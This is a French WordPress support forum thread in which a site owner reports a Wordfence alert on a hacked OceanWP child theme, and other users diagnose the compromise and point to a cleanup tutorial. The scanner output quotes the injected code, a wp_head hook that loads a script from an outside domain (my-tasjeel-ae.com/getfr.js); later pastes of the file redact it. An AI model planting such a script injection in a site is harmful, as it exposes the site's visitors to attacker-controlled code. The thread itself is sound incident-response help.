- WordPress :6.7
- Statut : résolu
- Ce sujet contient 13 réponses, 4 participants et a été mis à jour pour la dernière fois par
, le il y a 2 semaines et 2 jours.
-
Messages
-
Bonjour,
Ma configuration WP actuelle
- Version de PHP/MySQL : 8.2.28 _ WordPress 6.8.1
- Thème utilisé : OceanWP
- Extensions en place : Elementor – Royal Elementor- Smart Slider – SpeedyCache – Max Mega Menu…
- Nom de l’hébergeur : IONOS
- Adresse du site : https://echangesbretagnehaiti.fr/
Problème(s) rencontré(s) :
Bonjour,
Sur ce site que j’ai installé il y a de nombreuse années, l’extension Wordfence me signale ce danger:
« Filename: /homepages/14/d577650459/htdocs/_ebh2023/wp-content/themes/oceanwp-child/functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: {x0dx0a ?>x0dx0a<script async src= »https://my-tasjeel-ae.com/getfr.js »></script>x0dx0a <?phpx0dx0a}x0dx0ax0dx0aadd_action(« wp_headThe issue type is: IOC:PHP/head.script.14334
Description: Suspicious script inclusion via wp_head hook»
Quelqu’un peut me dire quelle pourrait être la cause réelle ou si c’est un ‘simple’ avertissement ?
Quelle pourrait être la solution ?Merci d’avance.
Bonjour, c’est un fichier de votre thème – un thème enfant d’OceanWP. J’ignore si vous avez accès aux fichiers originaux mais si c’est le cas, il suffit de remplacer par FTP tous les fichiers dans le répertoire oceanwp-child.
Bonsoir Li-AN,
Merci pour votre réponse.
J’ai accès aux fichiers…
Quelle est la source du fichier functions.php pour le thème enfant ? Celui du thème Parent ?Bonjour,
Qui a créé le thème ocean-child ? C’est vous qui l’avez créé manuellement, ou vous l’avez téléchargé sur un site officiel (peut-être une démo officielle) ?
- Dans le 1er cas, avez-vous souvenir d’avoir ajouté ce code ? (si la réponse est non, ce n’est pas bon signe)
- dans le 2ème cas, allez sur le site où vous avez téléchargé le thème ocean-child. Mais il faut que ce soit le site officiel de l’auteur, sinon, ce n’est pas bon signe non plus. Et re-téléchargez le thème ocean-child identique, vous y trouverez le fichier functions.php … a priori sans ce foutu code.
En espérant que ce code n’ait pas fait de dégât, car il n’a pas l’air très « honnête ».
Édit : ah ben si, les dégâts sont faits → le site est piraté (analyse Sucuri) !!
Suivez d’urgence la totalité de ce tuto de nettoyage de site hacké. Évidemment, vous devrez porter une attention particulière au nettoyage des fichiers du thème, en les re-téléchargent obligatoirement auprès d’une source fiable. Si besoin, commencez par mettre en place simplement le thème-parent Ocean-WP à la place du thème-enfant, puis effectuer le reste du nettoyage de votre thème-enfant.
Attention : si vous aviez personnalisé le thème-enfant ocean-child, nettoyez-le fichier par fichier comme indiqué, afin de ne pas perdre vos éventuelles modifications.Bonjour Flobogo,
J’étais absent… désolé pour ce retard.
Pour répondre à la question concernant la création de ocean-child, je suis passé par l’extension Child Theme ConfiguratorOK, le thème ocean-child que vous utilisez n’est donc pas une démo récupérable sur Internet, il vous est personnel.
Sauvegardez votre BDD et tous vos fichiers/dossiers comme indiqué dans le tuto de nettoyage, et suivez la totalité du tuto. A la fin, ré-installez une version saine du thème parent ocean-wp. Mais soyez très prudent avec votre ocean-child : ne le réinstallez pas sans avoir vérifié chaque fichier et nettoyé tout code suspect.
En visualisant le fichier functions.php, je vois ce contenu:
Filename: /homepages/14/d577650459/htdocs/_ebh2023/wp-content/themes/oceanwp-child/functions.php
File Size: 1,144 bytes
File last modified: Tuesday 27th of May 2025 08:32:24 PM
<?php
// Exit if accessed directly
if ( !defined( ‘ABSPATH’ ) ) exit;// BEGIN ENQUEUE PARENT ACTION
// AUTO GENERATED – Do not modify or remove comment markers above or below:if ( !function_exists( ‘chld_thm_cfg_locale_css’ ) ):
function chld_thm_cfg_locale_css( $uri ){
if ( empty( $uri ) && is_rtl() && file_exists( get_template_directory() . ‘/rtl.css’ ) )
$uri = get_template_directory_uri() . ‘/rtl.css’;
return $uri;
}
endif;
add_filter( ‘locale_stylesheet_uri’, ‘chld_thm_cfg_locale_css’ );if ( !function_exists( ‘child_theme_configurator_css’ ) ):
function child_theme_configurator_css() {
wp_enqueue_style( ‘chld_thm_cfg_child’, trailingslashit( get_stylesheet_directory_uri() ) . ‘style.css’, array( ‘font-awesome’,’simple-line-icons’,’oceanwp-style’ ) );
}
endif;
add_action( ‘wp_enqueue_scripts’, ‘child_theme_configurator_css’, 10 );// END ENQUEUE PARENT ACTION
/* Theme statistics function */
function xxxxxxxxxxxxxxxxx
?>
<script xxxxxxxxxxxxxxxxxxxxx></script>
<?php
}add_action(« xxxxxxxxxxxxxxxxxxxx
En visualisant le fichier functions.php, je vois ceci
»
Filename: /homepages/14/d577650459/htdocs/_ebh2023/wp-content/themes/oceanwp-child/functions.php
File Size: 1,144 bytes
File last modified: Tuesday 27th of May 2025 08:32:24 PM
<?php
// Exit if accessed directly
if ( !defined( ‘ABSPATH’ ) ) exit;// BEGIN ENQUEUE PARENT ACTION
// AUTO GENERATED – Do not modify or remove comment markers above or below:if ( !function_exists( ‘chld_thm_cfg_locale_css’ ) ):
function chld_thm_cfg_locale_css( $uri ){
if ( empty( $uri ) && is_rtl() && file_exists( get_template_directory() . ‘/rtl.css’ ) )
$uri = get_template_directory_uri() . ‘/rtl.css’;
return $uri;
}
endif;
add_filter( ‘locale_stylesheet_uri’, ‘chld_thm_cfg_locale_css’ );if ( !function_exists( ‘child_theme_configurator_css’ ) ):
function child_theme_configurator_css() {
wp_enqueue_style( ‘chld_thm_cfg_child’, trailingslashit( get_stylesheet_directory_uri() ) . ‘style.css’, array( ‘font-awesome’,’simple-line-icons’,’oceanwp-style’ ) );
}
endif;
add_action( ‘wp_enqueue_scripts’, ‘child_theme_configurator_css’, 10 );// END ENQUEUE PARENT ACTION
/* Theme XXXXXXXXXXXXXX */
function xxxxxxxxxxxxxxxxxxxxxxxxxx
?>
<script xxxxxxxxxxxxxxxxxxxxxxxxxxxx></script>
<?php
}add_action(« xxxxxxxxxxxxxxxxxxxxxxxxxxx
«
Bonjour,
Ce qui vient après // END ENQUEUE PARENT ACTION est le virus. Il faut suivre le tuto de @flobogo sans oublier d’enlever les lignes indésirables dans functions.php.
SVP, ne collez pas dans le forum le contenu de fichiers potentiellement dangereux !
Si besoin, faites une capture écran du contenu et ajoutez-la en pièce jointe.
- Vous devez être connecté pour répondre à ce sujet.